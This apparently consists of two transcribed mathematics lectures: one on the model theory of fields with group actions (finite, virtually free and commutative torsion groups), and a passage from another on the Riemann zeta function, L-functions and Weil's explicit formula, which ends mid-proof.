I do not have any general theorems saying anything for such a general question. The question is: if something good happens for G, does it also happen for a finite-index subgroup or a finite-index supergroup? In general I cannot say; only after analyzing a particular class, as we will see very soon, and even then it is not easy to get such conclusions. Okay, so that was the example of geometric axioms. There is one more kind of possible axioms. These fields C and K, K and the fixed field, have some Galois-theoretic properties. In the case of ACFA, K is just algebraically closed, and the fixed field C, besides being perfect and PAC, has absolute Galois group Z-hat, which means, by Ax, that C is pseudofinite. So one can ask: does this imply existentially closed, or not? I'm not sure about the proper credits, but it is written that, with probability one, if you take an automorphism of the algebraic closure of Q, then the pair satisfies these two items, but it is never a model of ACFA: models of ACFA of characteristic zero have infinite transcendence degree over Q. So, I would say (and I will formalize it at the very end) that ACFA is not axiomatized by Galois axioms; you need the geometric axiomatization. I will get back to this later. For finite groups, if you remember the axioms of ACFA, we did something similar with Daniel, but where ACFA has just one automorphism, one specific generator of Z, I now take the entire group G as my set of generators. So my W sits in the product of V hit by all elements of the group, and I am asking when this W gives a solvable difference equation. Still, all projections should be dominant, but the group is not free; it has a multiplication table, and this W should respect that table. I call it the iterativity condition, referring to iterative Hasse-Schmidt derivations, because of another topic, iterative Hasse-Schmidt derivations, which I worked on in connection with finite group schemes. Here the situation is very different, but there is something in common, so I call it iterativity. As you can see, if we apply this g_i to W, then we land in another product, but there is always a map, not just a projection, which is a permutation of the coordinates by this g_i, and on W these two things should have the same image. That means that W sits compatibly inside and gives you a solvable system of G-equations, and then we have the same conclusion: there is a solution, a point such that, when we apply the elements of the group acting on K to it on this variety V, it lies in our solution set W. So it is like the ACFA axioms, but with this extra iterativity condition corresponding to the fact that our group is not free anymore; it should respect the relations that the group has. These are the geometric axioms for finite G-TCF, and actually Galois axioms are also enough. What do the Galois axioms say now? Both fields are PAC; maybe not "Galois", but the G-field is strict, meaning (the same terminology as for Hasse-Schmidt) that the action is faithful. And the last one, about Galois groups: the restriction map from the absolute Galois group Gal(C^alg/C) to Gal(K/C), which can be identified with G, is a so-called Frattini cover: it is onto, but it is not onto from any proper closed subgroup.
Such continuous maps between profinite groups are called Frattini covers. Existentially closed G-fields have all these properties (this is perhaps not so surprising, because the Galois group here is actually bounded, as can be shown), and the converse also holds: if you have a G-field satisfying all of that, it is existentially closed. So I would say that G-TCF is axiomatized by Galois axioms as well. I will just quickly say: for ACFA it was important that it fits nicely into the stability or simplicity hierarchy; it is simple, so let's just say it is nice model-theoretically. How about G-TCF? These theories are bi-interpretable with the pure field C of constants, because K is a finite extension and everything is definable in C. Since C is PAC and bounded, it is supersimple of SU-rank one, and then G-TCF becomes supersimple of finite SU-rank. ACFA is also supersimple, but of SU-rank omega, infinite rank. So it is kind of nice, but all the structure actually comes from the field; it is really about the model theory of the one PAC field C. And we got something, but that is really only for model theorists: a slight improvement of the general theory, namely elimination of imaginaries after adding finitely many extra constants. I think in general Anand and Zoé showed it with infinitely many constants, but I don't want to dwell on this too much, since unfortunately I have two more sections. So we are done with finite groups; that was joint work with Daniel. Now the part with Özlem. We were wondering: can we somehow put the model theory of actions of free groups and the model theory of actions of finite groups into some ambient joint context? There is a very natural class of groups for such generalizations (this refers a bit to Serge's question): the virtually free groups, the groups having a free subgroup of finite index. In this particular case the answer to the question is yes, as we will see; the theory is axiomatizable, but the way it is done cannot be generalized to an abstract situation like the one asked about. Our axiomatization of actions of virtually free groups is such that the axioms are geometric, not Galois-theoretic; geometric as for ACFA, but they use the geometry underlying a given virtually free group in the sense of geometric group theory. This was crucial; we thought we would not be able to do anything without this geometric description of virtually free groups. The theorem is the classical one: a finitely generated group is virtually free if and only if it is isomorphic to the fundamental group of a finite graph of finite groups. I will explain a bit more: what does that mean? First you take finite groups and you can take free products, but also with amalgamation. So think about a tree where at each vertex a finite group is sitting, and on each edge a finite group is sitting which embeds into the vertex groups. You can amalgamate the whole situation: take free products with amalgamation as the tree tells you to do it.
That is the first part, but your finite graph need not be a tree: there may be some loops remaining, even loops around one vertex, and for all these remaining loops you have to do the corresponding HNN extensions, which I may also describe later if people ask what they are. So the picture may be extremely complicated, because every finite graph may be given the structure of a graph of groups; but this is the full description of the virtually free groups, and this is what we use. We describe a general procedure for how to change the axioms under each of the operations described here. We do show that if G is finitely generated and virtually free, then G-TCF exists, with axioms obtained by gluing the axioms for the particular finite groups, their G-TCFs, along this graph. How complicated is that? It may be complicated if the graph is complicated; let us see the simplest example to get some feeling. Take the simplest possible graph: just two vertices, with C2 on each vertex. I guess I can draw it instead of showing my two fingers. So the graph is: C2 here, C2 here, and on the edge basically nothing, or if you like the trivial group. That is the corresponding graph of finite groups, which is of course a tree, and it corresponds to the free product generated by two involutions. Another description: the infinite dihedral group, the semidirect product of Z and C2. And of course G-fields for this group are the same as fields with two involutive automorphisms, sigma and tau. Now you can perhaps see how we are gluing the axioms. You have to say when such a W, such a subvariety, gives a solvable system of G-equations, and we just give two conditions: we project it onto V times sigma(V) and say it should give a solvable system of C2-equations there, and we do the same projecting onto V times tau(V). So it is like a free amalgamation of the axioms, you could say, and then you get the same conclusion. You can perhaps imagine what happens if there is a group on the edge (you have to amalgamate the axioms over that group), and with an HNN extension you do something else. The confusing part is how Z fits here. Note that (I didn't say what an HNN extension is) Z is an HNN extension of the trivial group along the identity. So, somewhat amusingly, the ACFA axioms are not part of the basic axioms here; they are part of the gluing process, which you see at the level of HNN extensions. It is a bit complicated, but maybe you get a rough picture. Any questions on that? Now I have to undo this drawing. So this was the general theorem: the theory exists, and its axioms are obtained by this way of gluing. Of course there is no clear way to apply this in the general case, referring to the earlier question where I just have a finite-index subgroup and I know there are axioms for that subgroup; what we did was very specific to this situation. Now the question is whether the theories we obtain are nice, and the answer is actually no: only the theories we already knew are nice; all the new ones are not. Let me tell you why. Some technology: for any group H, H-hat is the profinite completion, the inverse limit of its finite quotients.
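To keep the simplest example above in view, here it is written out in standard notation (these are standard group-theoretic facts, with my choice of symbols for the two involutions).

```latex
\[
  C_2 * C_2 \;=\; \langle\, \sigma,\tau \mid \sigma^{2}=\tau^{2}=1 \,\rangle
  \;\cong\; D_\infty \;\cong\; \mathbb{Z}\rtimes C_2 ,
\]
% where the infinite cyclic normal subgroup is generated by \sigma\tau; a G-field for
% this group is exactly a field equipped with two involutive automorphisms \sigma and \tau.
```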
For any profinite group H, H-tilde is the universal Frattini cover. Let me not get into the definition; there was the definition of Frattini cover, and there is also a kind of largest one, unique up to isomorphism. And a profinite group is small if it has finitely many closed subgroups of any given finite index. We showed with Özlem that if the group is virtually free but "new", so finitely generated virtually free but neither finite nor free, then the following profinite group is not small: first we take the profinite completion, then the universal Frattini cover, and then we look at the kernel. This kernel is exactly the absolute Galois group of the underlying field of an existentially closed G-field, and it is not small. By results of Zoé, if a PAC field is not bounded, that is, its absolute Galois group is not small, then its theory cannot be simple, and apparently also not NTP2. So somehow they are not nice, and the theorem is that this theory is simple if and only if it is a theory we already knew; the new ones are not simple. Can they still be nice? I'm rushing, but I want to finish on time. There is all this neo-stability, as Anand was calling it; my education kind of stopped at the level of simple theories, so I'm not very familiar with it, but theories called NSOP1 are extensively studied; let's just think of them as not simple but still reasonably nice. Nick Ramsey suggested an argument that this G-TCF, for G finitely generated virtually free, should be NSOP1, and the argument hinges entirely on this description of the Galois group. We need to show one particular fact about the absolute Galois group of these underlying fields; if that is shown, we will know it is NSOP1, so still quite nice, in some new sense, just not simple anymore. So that's about this theory. Now the question: can we specify the class of finitely generated groups for which this theory exists? We conjecture, maybe prematurely, that the condition is exactly that they are virtually free. I must say I don't believe it so much anymore; we will try to test some other groups, like Coxeter groups, to actually disprove it. This conjecture is confirmed for commutative groups, but of course the structure of finitely generated commutative groups is very easy, so I don't believe now that it's true in general. Of course, if Z x Z embeds in G, then G is not virtually free, and it looks like there should be a proof, which we still do not have, that if Z x Z embeds in G, then G-TCF does not exist. That would be in the direction of negative results, but this is a much smaller class of groups: if Z x Z embeds in G then G is not virtually free, but there are many groups which are actually pretty nasty, like infinite Burnside groups or Tarski monsters; they are finitely generated but periodic, so even Z does not embed in them, and these are the usual sources of counterexamples. I guess tackling such crazy groups will be the most difficult part of understanding when G-TCF exists for a finitely generated group. So let me finally get to the last part, which is our newest work with Özlem.
So what happens when the group is not finitely generated and we cannot easily access a geometric axiomatization, because we cannot just take a product of varieties hit by all generators: it becomes an infinite product, not first-order, so it is hard to control the full action in a first-order way. One way to deal with it is to hope that the theory is nicely approximated logically, which need not happen. Here is a very general statement, which I state in general terms and then explain for groups. If you have a chain of theories (think of a chain of theories of G-fields where the groups are growing), if they all have model companions, these G-TCFs, and if the model companions form a chain as well, then the union of this chain of model companions is the model companion of the union of the original chain. This is a rather easy observation, already appearing in the literature. What does it mean in our situation? I assume that G is a union of groups G_n such that each G_n-TCF exists; then, by the previous slide, if these G_n-TCF form an increasing chain, we are done. But then things get subtle. First, Alice Medvedev did it for Q: of course Q is a union of infinite cyclic groups where we allow greater and greater denominators, generated by 1 over n factorial. The assumptions are satisfied, so we get the union theory, which Alice called QACFA; in our terms it would be Q-TCF. That is the positive situation. We also learned that the assumptions are satisfied for the Prüfer group, C_{p-infinity}, the union of all cyclic p-groups; but if, instead of cyclic p-groups, you take products, then you do not get a chain. If I have time, which I don't, I may explain on the last slide why not. Similarly, look at this funny group, the direct product over all primes p of the cyclic groups C_p, so C2 times C3 times C5 and so on. Sorry, there is a typo on the slide, it should be TCF here: C_p-TCF is not a subtheory of C_{p^2}-TCF, and C2-TCF is not a subtheory of (C2 x C3)-TCF, which is C6-TCF. But still, the full theory exists; the theorem here gives only one implication, it is not an if-and-only-if. The last slide: let me look at commutative torsion groups, which are unions of finite commutative groups. There we actually get the full answer, which is again perhaps a bit surprising. The group A decomposes as a direct sum of p-primary parts, of p-groups, and the condition for A-TCF to exist is that each of them should be finite or Prüfer. So a group like Prüfer plus C_p is a forbidden group; this we should not have. And if this theory exists, it is strictly simple: not stable, not supersimple, which is easy, since simplicity is a kind of logically local property. Oh, I'm one minute over time. This theory is axiomatized by Galois axioms, which I am specifying here, and actually not by geometric axioms, because it is not the union: the action should be faithful, K should be perfect, there should be a choice of these A_i such that each of them is PAC, and they should have the prescribed small profinite groups as absolute Galois groups. So that's the axiomatization. Sorry, that's all the time; I stop here, thank you. Thank you very much. Are there any questions? I have a question. Yes.
You know, I wonder: there is this famous theorem, I can't remember who did it, maybe Muller and Schupp or Dunwoody or someone, proving that the finitely generated groups with context-free word problem are precisely the virtually free ones. Do you expect some connection between G-TCF and the word problem for a group? Yes; morally there is a lot of connection, because these are exactly the virtually free groups. There are many equivalent conditions, like the Cayley graph having finite tree-width or something; if you look at these conditions, they morally tell you yes, but technically we were only able to use the geometric condition. Maybe there could be another approach using those other characterizations; there are many equivalent conditions, like the one you said, which are logical in nature, but we couldn't employ them. I'm sure there are some deeper connections; we are definitely looking at this and trying to use them, but in the end it was Bass-Serre theory that turned out to be useful. There should be something there, but I don't know what is really there. Well, I may show this slide and say nothing. I have a question: have you thought about a theory where the field is endowed with a valuation? So you endow your field with a valuation and you have a group whose action respects the valuation, or something like that. Yes; actually Daniel Hoffmann started a project in which he applies group actions to any theory, and this would be one particular instance; I think it is a good idea to look at that. People were doing a version for actions of Z, a valuation together with an automorphism; many people were looking at that theory, but I don't know of any work with other groups. It is definitely a good idea to look at it, so that's my answer. And I was wondering: with Z squared your theory doesn't exist, but if you add a valuation, is it known? That is a better question. No, it's not known to my knowledge whether the theory of valued fields with two commuting automorphisms has a model companion, in model-theoretic terms. Maybe somebody here knows; I don't. Good question. It feels like, with some extra constraints, maybe it would be possible, but in this particular case I have no idea. More questions? Okay, let's thank Piotr again. And we have
For a fixed group G, we study the model theory of actions of G by field automorphisms. The main question here is to characterize the class of groups G for which the theory of such actions has a model companion (a first-order theory of "large" actions). In my talk, I will discuss several classes of groups G in this context. The case of finite groups is joint work with Daniel Hoffmann ("Existentially closed fields with finite group actions", Journal of Mathematical Logic, (1) 18 (2018), 1850003). The case of finitely generated virtually free groups is joint work with Özlem Beyarslan ("Model theory of fields with virtually free group actions", Proc. London Math. Soc., (2) 118 (2019), 221-256). The case of commutative torsion groups is joint work with Özlem Beyarslan.
10.5446/54157 (DOI)
Well, I'm also truly thrilled to be back here; it's always a pleasure. A lot of the talks in this school will be relating formulae that appear in random matrix theory to integrable structures in that theory. They are one of the reasons why one can compute things, why the formulae that emerge in random matrix theory take particularly simple and attractive forms. For example, in random matrix theory for the classical ensembles one can compute correlations of the eigenvalues, and those correlations can be expressed in determinant form. The determinants involve classical orthogonal polynomials, and so in that sense things are exactly solvable. You can compute the large-matrix asymptotics of those determinants and get other, even simpler determinant forms. So one has this notion that random matrix theory is some exactly solvable, exactly integrable problem. Well, I'm going to take a somewhat orthogonal perspective here. I suppose I'm representing the point of view that, somewhat surprisingly, the same simple formulae, these determinant forms that one gets for correlation functions and their generalizations to other statistics, also emerge in settings where we don't see any integrability. In that case their explanation is somewhat more mysterious, and I'll be talking about one example of that, namely where these formulae appear in number theory. So this really will be orthogonal to most of the other talks in the school, in that my main purpose is to show you how these determinant expressions for correlation functions, and their generalizations to other statistics, appear for completely different reasons and within a completely different framework. This is quite a surprise, and it is not properly understood, I would say. So I'm going to start with a famous example in number theory, which is the Riemann zeta function. I should emphasize that most of the talks will be about the number-theoretic framework that allows one to do calculations, but I won't assume that you have any background in number theory, or I'll try not to assume that. The Riemann zeta function is a function of a complex variable s defined by a sum, the sum over n of 1 over n to the s; this is called a Dirichlet series, and the series converges if the real part of s is greater than 1. Equivalently, you can represent the zeta function, and this is why it's important in number theory, as a product over primes; this is called an Euler product, and it also converges if the real part of s is greater than 1. It's the second representation, as I say, which is why the zeta function is an object of such importance: it encodes information about the distribution of the primes. This was realized first of all by Euler, but really exploited, most famously, by Riemann. The zeta function has certain properties. You can continue it from this half-plane to the rest of the complex plane. It has a symmetry, the functional equation, and this is sufficiently important that I'll sketch the ideas behind the proof, so that those who have not seen it can see it at least once in their lifetime. The idea is that if you take the zeta function and define an auxiliary function, which I'll call zeta tilde, namely pi to the minus s over 2 times gamma of s over 2 times zeta of s, then this auxiliary function is symmetric under s goes to 1 minus s. This is the functional equation; it's a symmetry around the line real part of s equals one half. And the proof of this I'll just give you for completeness.
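A quick numerical illustration of the two representations just mentioned, the Dirichlet series and the Euler product, agreeing for Re(s) > 1. This is my own sanity check, not something from the lecture; the truncation cutoffs are arbitrary choices.

```python
# Compare the truncated Dirichlet series and truncated Euler product for zeta(s).

def zeta_dirichlet(s, n_max=100000):
    """Truncated Dirichlet series: sum_{n <= n_max} 1/n^s."""
    return sum(n ** (-s) for n in range(1, n_max + 1))

def primes_up_to(limit):
    """Simple sieve of Eratosthenes."""
    sieve = [True] * (limit + 1)
    sieve[0:2] = [False, False]
    for p in range(2, int(limit ** 0.5) + 1):
        if sieve[p]:
            sieve[p * p :: p] = [False] * len(sieve[p * p :: p])
    return [p for p, is_p in enumerate(sieve) if is_p]

def zeta_euler(s, p_max=100000):
    """Truncated Euler product: prod_{p <= p_max} (1 - p^{-s})^{-1}."""
    result = 1.0
    for p in primes_up_to(p_max):
        result *= 1.0 / (1.0 - p ** (-s))
    return result

if __name__ == "__main__":
    s = 2.0
    print(zeta_dirichlet(s))   # ~ pi^2/6 = 1.6449...
    print(zeta_euler(s))       # should be close to the same value
```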
The proof uses the following observation: if you take pi to the minus s over 2 times gamma of s over 2 times 1 over n to the s, which you'll see is one part of the Dirichlet series defining the zeta function, you can write it as an integral, the integral from 0 to infinity of x to the s over 2 minus 1 times e to the minus n squared pi x, dx. You see that just by changing variables and recognizing the gamma function. Therefore zeta tilde of s can be written as the integral from 0 to infinity of x to the s over 2 minus 1 times a function w of x, dx, where w of x is the sum from n equals 1 to infinity of e to the minus n squared pi x. If you choose, you can split the integral from 0 to infinity into the integral from 1 to infinity and the integral from 0 to 1, and, if you're so minded, you can in the second integral replace x by 1 over x, making that integral range from 1 to infinity like the first one. You end up with: zeta tilde of s equals the integral from 1 to infinity of x to the s over 2 minus 1 times w of x, dx, plus the integral from 1 to infinity of x to the minus s over 2 minus 1 times w of 1 over x, dx. It seems like we've not bought ourselves very much, but this w function has a very important symmetry of its own. If we write theta of x for the sum from n equals minus infinity to infinity of e to the minus n squared pi x, which is secretly 1 plus twice w of x, then this theta function satisfies a very important equation: theta of 1 over x equals the square root of x times theta of x. This is the modular symmetry, if you like, of this elementary modular form, and you can prove it in an elementary way for yourselves; it follows just from the Poisson summation formula. The Poisson summation formula is a general formula which says that if I have some function f, then the sum of f over the integers, provided it converges, so subject to some conditions on f, is equal to the corresponding sum of the Fourier transform of f, where f hat of y is defined to be the integral from minus infinity to infinity of f of x times e to the 2 pi i x y, dx. This is a general formula that comes from Fourier analysis, and if you substitute in for f the Gaussian appearing here, the identity is just the fact that the Fourier transform of a Gaussian is a Gaussian; it's nothing more than the fact that the Gaussian is an eigenfunction of the Fourier transform. With this equation we can write w of 1 over x back in terms of w of x, and the expression above becomes the integral from 1 to infinity of x to the s over 2 minus 1 plus x to the (1 minus s) over 2 minus 1, times w of x, dx. And then we're done, modulo two facts. One is a term I've missed out, coming from the term 1 here: it is plus 1 over s times (s minus 1); that is now the correct formula. Because w of x clearly decays exponentially, this integral makes sense for any s, so this gives an analytic continuation to the whole complex plane, minus the points 0 and 1, which come from the 1 here: the theta function is symmetric under x goes to 1 over x, but there's a 1 that you have to incorporate. And second, you see the expression is symmetric under s goes to 1 minus s. So this proves the functional equation, and this is a very important observation, which was due to Riemann.
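A numerical check of the theta functional equation theta(1/x) = sqrt(x) * theta(x), which the argument above derives from Poisson summation. This is my own illustration, not from the lecture; the series converges very fast, so a modest cutoff suffices.

```python
import math

def theta(x, n_max=200):
    """theta(x) = sum_{n=-inf}^{inf} exp(-n^2 * pi * x), truncated at |n| <= n_max."""
    return 1.0 + 2.0 * sum(math.exp(-n * n * math.pi * x) for n in range(1, n_max + 1))

for x in (0.3, 1.0, 2.7):
    lhs = theta(1.0 / x)
    rhs = math.sqrt(x) * theta(x)
    print(x, lhs, rhs, abs(lhs - rhs))   # the differences should be tiny
```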
And it allows us to continue the zeta function, where the picture looks as follows. The zeta function has a pole at s equals 1. The formula I wrote up there converged to the right of that pole, so out there to the right we have the Dirichlet series and the Euler product, and you see straightforwardly that the Euler product is a convergent product of terms which have no zeros to the right of this point; therefore the zeta function itself has no zeros to the right of s equals 1. The functional equation gives us a reflection symmetry with respect to the line real part of s equals one half. Therefore, since the zeta function is very simple to the right of s equals 1, it is also very simple to the left of s equals 0, by reflection, and the zeta function is essentially extremely simple over there. It does have zeros there, coming from the poles of the gamma function: the zeros are at minus 2, minus 4, minus 6, et cetera, so zeta of minus 2n is 0 for n equals 1, 2, 3 and so on; those are just the poles of the gamma function, as I say. So there are no other singularities: this is the only pole of the zeta function; it's a meromorphic function. It has these simple zeros at the negative even integers, it has no zeros to the right of s equals 1, and that just leaves us with the strip bordered by the lines real part of s equals 1 and real part of s equals 0. This is what's called the critical strip, and in this strip the zeta function can have zeros, and indeed it does; I'll show you that it has infinitely many zeros inside that strip. And of course the Riemann hypothesis is that all of the zeros lie exactly on the symmetry line, real part of s equals one half. If I denote the zeros inside the strip by one half plus i t_n, then the Riemann hypothesis, formulated by Riemann in 1859, is that all of these zeros lie on the line with real part one half; written this way, it means that all the numbers t_n are real. If there are zeros off the critical line, say we find a zero here, then by the functional equation, s goes to 1 minus s, there must be a zero reflecting this one down here; and since the zeta function is real when s is real, and it's an analytic function, if this is a zero then its complex conjugate is a zero too. So zeros off the line come in fours: all the zeros are symmetric about the real s-axis, and any zeros off the line must also be symmetric with respect to reflection through the critical line, the line real part of s equals one half. Of course, as far as we know, there are no zeros off the line. The Riemann hypothesis is known to be true for the first 10 trillion zeros, that's the first 10 to the power 13. It's known that there are infinitely many zeros on this line; that's due to Hardy. It's known that if you consider a box, count the zeros inside that box on or off the line, and let the length of the box go to infinity, then a positive proportion of the zeros lie on that line; that was first proved by Selberg. We now have good lower bounds for that proportion: at the moment we know that at least 42% of the zeros do lie exactly on that line. This was an idea going back to Levinson, very much improved and refined by Brian Conrey, and Conrey's proof has since been further refined, so from his lower bound of 40% it has now got up to 42%.
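To get a feel for these zeros, one can compute the first few with the mpmath library (this assumes mpmath is installed; it is my own illustration, not part of the lecture). They all lie on the critical line, consistent with the numerical evidence just described.

```python
from mpmath import zetazero

# zetazero(n) returns the n-th non-trivial zero 1/2 + i*t_n of the zeta function.
for n in range(1, 6):
    print(n, zetazero(n))   # e.g. zetazero(1) is approximately 0.5 + 14.134725...j
```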
So we believe the Riemann hypothesis is true: there is a great deal of evidence for it, and a great deal of numerical evidence not just for the first 10 to the 13 zeros, which is an exact statement, but for batches of zeros much higher up. The world record at the moment is that zeros have been computed up near the 10 to the 36th zero, and all the zeros in a long range up there lie exactly on the line. So that's the state of play for the Riemann hypothesis. Now, this isn't something special to the zeta function. There is a whole class of functions called L-functions, of which the zeta function is just one representative example. I won't go into this too much, since it isn't the point of this school, but there are lots of functions which have a Dirichlet series, that is, they can be written as a sum of a_n over n to the s; that's very easy to arrange. They also have an Euler product; that is the statement that the numbers a_n are multiplicative, so you can write the function as a product over primes of sums, say the sum over j from 0 to infinity of b of p to the j, over p to the j s. Again, that's not too difficult to arrange: you just have to force the function a to be multiplicative. So there are lots of examples of functions you can write in this form, but the difficulty is that almost any example you write down does not have a functional equation, and the L-functions are the functions which do have a functional equation, a reflection under s goes to 1 minus s. It is exceptionally difficult to arrange for functions to have these three properties, but there are examples; the Riemann zeta function is one, and I've proved all of that for you. There are many other examples, and I'll give you one class of functions which satisfies these axioms. This is the function L of s, chi_d, which is the product over p of (1 minus chi_d of p over p to the s) to the minus 1, where the function chi_d of p is plus 1 if the prime p does not divide the integer d and d is congruent to a square mod p, which means you can find an integer whose square is congruent to d mod p; it is minus 1 if d is not congruent to a square mod p; and it is 0 if p divides d. Being congruent to a square means there is a solution to the equation n squared congruent to d mod p: you can find an integer whose square is congruent to d if you do arithmetic modulo p; in the other case you cannot find such a solution. I won't prove it for you, but it was known in the 19th century that these functions satisfy the conditions. There is an Euler product, which I've written out for you; just by multiplying out the Euler product you get a Dirichlet series; and then the difficult part, though not too difficult, is that these satisfy a functional equation. Yes, a question: does the functional equation look exactly the same? It looks very, very similar: there's a gamma function, there's a power of pi, and there's one extra factor, a phase factor, which needn't concern us. So it's essentially the same, and crucially there is one gamma factor appearing and the power of pi is the same, so it has a very similar structure. These were all worked out in the 19th century, and then in the 20th century people found other classes of L-functions.
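A tiny computational illustration of the character chi_d just defined, computed via Euler's criterion: for an odd prime p not dividing d, d is a square mod p exactly when d^((p-1)/2) is congruent to 1 mod p. This is my own sketch, not code from the lecture.

```python
def chi(d, p):
    """Return +1, -1 or 0 according to whether d is a nonzero square, a nonsquare,
    or zero modulo the odd prime p (Euler's criterion)."""
    if d % p == 0:
        return 0
    return 1 if pow(d, (p - 1) // 2, p) == 1 else -1

# Example with d = 5: chi_5(p) = +1 precisely for the odd primes p (other than 5)
# that are congruent to +1 or -1 mod 5.
for p in [3, 7, 11, 13, 19, 29, 31]:
    print(p, chi(5, p))
```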
That was quite a surprise: there are other functions which satisfy those axioms but where two gamma factors appear in the functional equation. Examples would be L-functions associated with elliptic curves, and in that case the functional equation was only proved in Andrew Wiles's work on Fermat's last theorem, in the 1990s; it is much harder to prove the functional equation in that case. We now understand that there is a wide class of functions which have two gamma factors, and many of these examples were worked out in the 20th century. It is really very recent that people have found examples of L-functions with three or more gamma factors in their functional equation; those are really quite exotic and not properly understood. There is a general theory for where these L-functions come from: they are associated with representation theory, and this is the Langlands program, but that's very far from being properly worked out. So there are examples, and that's all we need to know here. The picture you might want to have in mind is an infinite class of functions indexed by an integer labelled d; for each d you have a different function, and each of those functions satisfies these properties. And the general expectation is that all L-functions (I'll put in a get-out-of-jail-free card, just for the experts in the audience: all primitive L-functions, which means that the L-function doesn't factorize for trivial reasons) satisfy a Riemann hypothesis. That's the expectation, and it is called the generalized Riemann hypothesis or the grand Riemann hypothesis, GRH. So the Riemann hypothesis isn't something special to the Riemann zeta function: there is an infinite class of functions, such as the example above, each of which satisfies a Riemann hypothesis, we believe, and numerical evidence supports that statement. And then there are these higher-dimensional versions from the 20th century, so to speak, with modular forms; they all satisfy a Riemann hypothesis, we believe. So there is a general picture that the Riemann hypothesis is true of a very general class of special functions called L-functions, and this is going to be important later. You might want to think of it in the following way: these L-functions, indexed by my integer d, here's one L-function, here's another for a different value of d, here's a different one; all these different functions have a symmetry line, and they all have a Riemann hypothesis that places their zeros on that line. There was a question: in these modular examples, what is the analogue of the Poisson summation formula? It is the symmetry of the Fourier transform of the character chi. Right, so that's some background on L-functions. Now I'm going to introduce the one tool that we have to understand these zeros. Analytic number theory is somewhat impoverished compared to random matrix theory, where, as we've heard, there are many approaches: Riemann-Hilbert, classical operator theory, et cetera. Really, in analytic number theory there is one tool one can use, and it is called the explicit formula. I'll set it up for the Riemann zeta function, but there is such a formula for any L-function, and I'll tell you how to generalize it and write it down for all L-functions. So I'm going to give you one version of the explicit formula.
There are many of them, depending on which application you have in mind, but they all have more or less the same form. So I'll write down the version that is the easiest one. So let g be a C-infinity function which is compactly supported on the real line, so it's a smooth, compactly supported function, and we'll assume that it's symmetric, so g of minus x equals g of x. That's not necessary; you can write down formulae when that's not the case, but they're just a little uglier, and that generality doesn't buy very much, so I won't invoke it. And let's set h of z to be the Fourier transform of g. And now, against all my instincts, I'm going to define the Fourier transform without 2 pi in the exponent, which is a horrible thing to do, but it will make life a little easier for this calculation. So since g is smooth and compactly supported, h is an entire function, and it decays exponentially on the real axis: h of z is of order e to the minus c mod z as mod z tends to infinity with z real. Now I'm going to define the following function, called the von Mangoldt function: Lambda of n is log p if the integer n is a power of a prime p, and it's 0 otherwise. This function seems a little unnatural, but in number theory it's a very natural object, for the following reason: if I take the Riemann zeta function and take its logarithmic derivative, this is minus the sum, n from 1 to infinity, of Lambda of n over n to the s. And you see that simply by taking the logarithm of the Euler product, the logarithm of the product is a sum, and then differentiating that; you get immediately to this formula. So now here's the explicit formula, and the details won't matter to us, but this is the one formula you should pay great attention to. Here's the theorem, which is due in this generality to André Weil, and it says the following. Let's take a sum over all the non-trivial zeros, that is, the complex zeros of the zeta function, and evaluate h at the t n. So remember, I'm writing the zeros as a half plus i t n, and then I'm getting these numbers t n. There are infinitely many of them, and I'm evaluating h at those and summing. And then I subtract off twice h of i over 2. So the t n's correspond to the zeros in this strip. Yes, on the line or off the line? On the line or off the line; we're not assuming the Riemann hypothesis here. But yes, there are zeros inside the strip. Sorry? Yeah, it's the imaginary part: the zeros are a half plus i t n, and I'm getting the numbers t n, which may or may not be real. OK. And I'm summing h over those numbers. Now, the Riemann hypothesis would say these numbers are all real, but I'm not assuming that. h is an entire function, so I can sum it at these infinitely many values. And then the theorem is that you can evaluate this to be the following. It's 1 over 2 pi times the integral of h of r times, in brackets, gamma prime over gamma of a quarter plus i r over 2 minus log pi, dr, minus twice the sum over m of Lambda of m over root m times g of log m. So we'll spend some time talking about this formula and unpacking what it's telling us. Yes? This function h, why does it have this decay, and where? When z is real. If z is real, it's on the real axis, and h decays exponentially for either positive or negative z. And that follows because g is compactly supported: h is the Fourier transform of a compactly supported smooth function.
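For readers following along, here is the formula just stated, written out in symbols. This is only a transcription of the version given in the lecture, with the Fourier transform taken without the 2 pi in the exponent and the zeros written as rho equals one half plus i t_n.

```latex
% One version of the explicit formula, as stated above.
% g smooth, compactly supported, even;  h(z) = \int_{-\infty}^{\infty} g(x)\, e^{izx}\, dx.
\sum_{n} h(t_n) \;-\; 2\,h\!\left(\tfrac{i}{2}\right)
 \;=\; \frac{1}{2\pi}\int_{-\infty}^{\infty} h(r)
        \left(\frac{\Gamma'}{\Gamma}\!\left(\tfrac14+\tfrac{ir}{2}\right)-\log\pi\right)dr
 \;-\; 2\sum_{m=1}^{\infty}\frac{\Lambda(m)}{\sqrt{m}}\, g(\log m),
\qquad
\Lambda(n)=\begin{cases}\log p, & n=p^{k},\\ 0, & \text{otherwise.}\end{cases}
```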
Yeah, you can work. Yes? Yeah. So you know that. Yes. Exactly. Yeah. Yeah. Yeah. So this converges under the assumptions that I've stated. So what's this telling us? It's saying that we pick our function h and g of Fourier transforms of each other. But we have freedom to choose what g is. Once we've chosen that, we can't choose what g is. Once we've chosen g, we then give an h and vice versa. So it says that we choose a function. Let's say we choose the g function. And we want to evaluate a sum over primes and their powers. The lambda function picks out is non-zero only when it's argument is a power of a prime. We're coming over powers of primes here. And we're evaluating the g function at the log of those prime powers for any function g that satisfies the conditions of theorem. And the statement is that you can evaluate this sum over primes and their powers in terms of a sum over the zeros, where what appears is the Fourier transform of g. And you have this additional integral that appears. Vice versa, if you want to understand the zeros, you want to choose your function h so that you evaluate this is some nice function which you want to analyze summed over the zeros. And the statement is that then a sum over the zeros is equivalent to a sum over primes in their powers, where what appears here is then the Fourier transform of h. Again, there is this factor here, this integral. The right hand side is a finite sum, yeah, if g is compactly supported. And so I've written in that form because I'm going to want to use this to analyze the primes for a moment. But vice versa, I could have chosen h to be compactly supported, then g wouldn't be. But there is a sort of duality going on here in that if I want to analyze primes zeros in some small range of the critical strip. So h is a localized function, then g will be very delocalized, and I'll have a very long sum over the primes. Vice versa, if I want to analyze primes in a short range, g will be very localized, and h will be very delocalized. I'll have a long sum over the zeros. And a lot of analytic number theory is playing off those two things against each other. It's optimizing the functions g and h so that you analyze some property that you wish to understand. So let me give you the proof of this or sketch you. I'll give you the ideas behind the proof, and I'll leave the proof as an exercise for those who want to do it. It's pretty straightforward. So the proof, let's set. This is follows. Let's set h of s to be the integral of g of x. e to the s minus 1 half x dx. So this is g is compactly supported. This makes sense. And we're going to compute the following integral, 1 over 2 pi i integral c going from c, the integral goes from c minus i infinity to c plus i infinity, where c is greater than 1. So this is a contour integral on some line parallel to the imaginary axis, but 